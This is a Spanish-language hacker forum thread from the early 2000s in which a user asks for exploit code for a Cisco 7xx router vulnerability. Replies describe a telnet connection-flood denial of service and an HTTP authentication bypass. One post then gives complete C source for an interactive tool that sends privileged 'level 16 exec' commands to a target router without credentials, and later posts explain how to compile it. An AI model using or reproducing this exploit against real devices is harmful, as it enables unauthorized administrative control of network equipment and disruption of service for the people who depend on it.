Resultados 1 al 10 de 10

Tema: Que alguien me ayude con este exploit

  1. #1 Que alguien me ayude con este exploit 
    Medio
    Fecha de ingreso
    Nov 2001
    Mensajes
    57
    Descargas
    0
    Uploads
    0
    Tengo un exploit o un vulnerabilidad para un router Cisco. Os pongo las paginas para que os las mireis si quereis decirme algo.http://packetstorm.widexs.nl/9903-ex...x.tcp.http.txt
    http://www.cisco.com/warp/public/770/7xxconn-pub.shtml
    No estoy seguro para que sirve esta vulnerabilidad
    Citar  
     

  2. #2  
    Iniciado
    Fecha de ingreso
    Dec 2001
    Mensajes
    16
    Descargas
    0
    Uploads
    0
    Hola:


    No entiendo lo q preguntas. Q quieres, una traduccion?
    Citar  
     

  3. #3  
    Medio
    Fecha de ingreso
    Nov 2001
    Mensajes
    57
    Descargas
    0
    Uploads
    0
    Pregunto si alguien conoce o entiende el exploit, ya que no he podido encontrar el exploit. En este texto sólo se habla de los fallos, pero no da ni codigo fuente para explotarlos ni nada parecido.
    La traducción no es necesaria, aunque tampoco se mucho de ingles pero bueno, me apaño.
    En definitiva si pudises ayudarme a buscar un codigo fuente para el fallo numerado por CISCO CSCdm03231.
    Than you
    Citar  
     

  4. #4  
    Iniciado
    Fecha de ingreso
    Dec 2001
    Mensajes
    16
    Descargas
    0
    Uploads
    0
    OK

    si encuentro algo te aviso
    Citar  
     

  5. #5 no estoy muy puesto 
    Avanzado
    Fecha de ingreso
    Dec 2001
    Ubicación
    BCN
    Mensajes
    469
    Descargas
    0
    Uploads
    0
    Lo cierto que que no se mucho de Exploits, pero la idea es que si tienes una cuenta de usuario en un ordenata puedes subir el exploit y ejecutarlo desde un Shell y conseguir así acceso de Root.

    Para generar exploits lo mejor es saber programar en algun lenjuaje de programacion. En linux se puede aprobechar los scripts de Shell, que son algo así como los bat de Dos, pero son especificos para Shell.

    Un saludo
    La resitencia es futil, todos sereis asimilados.
    NeoGenessis
    Citar  
     

  6. #6  
    Medio
    Fecha de ingreso
    Dec 2001
    Mensajes
    87
    Descargas
    0
    Uploads
    0
    Los bugs ke se mencionan en esa page afectan a los routers Cisco 7xx.
    El primer bug es una denegacion de servicio causada por una serie de conexiones TCP al puerto (23) Telnet del router,o sea , ke si bombardeas el 23 del router con conexiones TCP pofff keda parvo..jajaj .

    El 2º habla de un bug en el servidor HTTP por el cual es posible saltarse la autentificacion y ejecutar comandos en el router con nivel 15 (el nivel con mas privilegios) este bug se explotaria de esta forma

    http://<device_addres>/level/xx/exec/....
    Donde xx es un numero entre 16 y 99 porke cada Cisco IOS tiene una combinacion diferente.




    Citar  
     

  7. #7  
    Medio
    Fecha de ingreso
    Dec 2001
    Mensajes
    87
    Descargas
    0
    Uploads
    0
    Esto igual es mas comodo para el server web del Cisco.


    #include <stdio.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    #define HTTP_PORT 80
    #define PROMPT "\ncisco$ "

    int usage (char *progname) {
    printf ("Usage:\n\t%s server\n", progname);
    exit(-1);
    }

    int main (int argc, char *argv[]) {
    struct hostent *he;
    struct sockaddr_in sin;
    int sck, i;
    char command[256], buffer[512];
    if (argc < 2)
    usage(argv[0]);
    if ((he = gethostbyname(argv[1])) == NULL) {
    perror("host()");
    exit(-1);
    }
    sin.sin_family = AF_INET;
    sin.sin_port = htons(HTTP_PORT);
    sin.sin_addr = *((struct in_addr *)he->h_addr);
    while (1) {
    if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
    perror("socket()");
    exit(-1);
    }
    if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
    perror ("connect()");
    exit(-1);
    }
    printf (PROMPT);
    fgets (command, 256, stdin);
    if (strlen(command) == 1)
    break;
    for (i=0;i<strlen(command);i++) {
    if (command[i] == ' ')
    command[i] = '/';
    }
    snprintf (buffer, sizeof(buffer),
    "GET /level/16/exec/%s HTTP/1.0\r\n\r\n", command);
    write (sck, buffer, strlen(buffer));
    memset (buffer, 0, sizeof(buffer));
    while ((read (sck, buffer, sizeof(buffer))) != 0) {
    if ((strstr(buffer, "CR</A>")) != 0) {
    printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
    memset (buffer, 0, sizeof(buffer));
    break;
    } else if ((strstr(buffer, "Unauthorized")) != 0) {
    printf ("Server not vulnerable\n");
    exit(-1);
    } else {
    printf ("%s", buffer);
    memset (buffer, 0, sizeof(buffer));
    }
    }
    }
    printf ("Thanks...\n");
    exit(0);
    }
    Citar  
     

  8. #8  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    Mandala como siempre, un makina Salu2
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  9. #9  
    Medio
    Fecha de ingreso
    Nov 2001
    Mensajes
    57
    Descargas
    0
    Uploads
    0
    Gracias por la respuesta MANDALA. Lo unico que me falta es aprender a compilar estos exploits. Si me pudieras decir donde puedo encontrar las librerias o .h que están en el codigo fuente te lo agradecería
    Citar  
     

  10. #10  
    Medio
    Fecha de ingreso
    Dec 2001
    Mensajes
    87
    Descargas
    0
    Uploads
    0
    Pues para compilar los exploits te serviria un linux.Si no lo tienes prueba a instalarte el Cygwin y acuerdate de instalar el gcc o algun compilador de C cuando instales el cygwin.

    Cygwin es un entorno Unix para Windows. Este consiste de dos partes: una DLL (cygwin.dll) la cual actúa como un emulador Unix el cual provee funcionalidades API. Una colección de herramientas para Unix, la cual provee un aspecto Unix/Linux



    La Cygwin DLL trabaja con todas las versiones de Windows desde Windows 95 con escepción de Windows CE.



    Para más información: www.cygwin.com
    Citar  
     

Temas similares

  1. !!Que alguien me ayude por favor¡¡¡
    Por Rubito_84 en el foro DIGITAL+
    Respuestas: 6
    Último mensaje: 13-12-2007, 23:21
  2. que alguien me ayude !!
    Por jose lopez en el foro DIGITAL+
    Respuestas: 3
    Último mensaje: 31-03-2007, 16:39
  3. alguien k me ayude
    Por fraijol en el foro EMULADORES TELEFONICOS
    Respuestas: 1
    Último mensaje: 08-07-2006, 00:51
  4. Alguien que ayude con Dish
    Por ecolon en el foro TELEVISION
    Respuestas: 0
    Último mensaje: 06-05-2006, 06:49
  5. quiero que alguien me ayude
    Por LORENITA en el foro TELEFONÍA MOVIL
    Respuestas: 0
    Último mensaje: 17-06-2005, 22:46

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •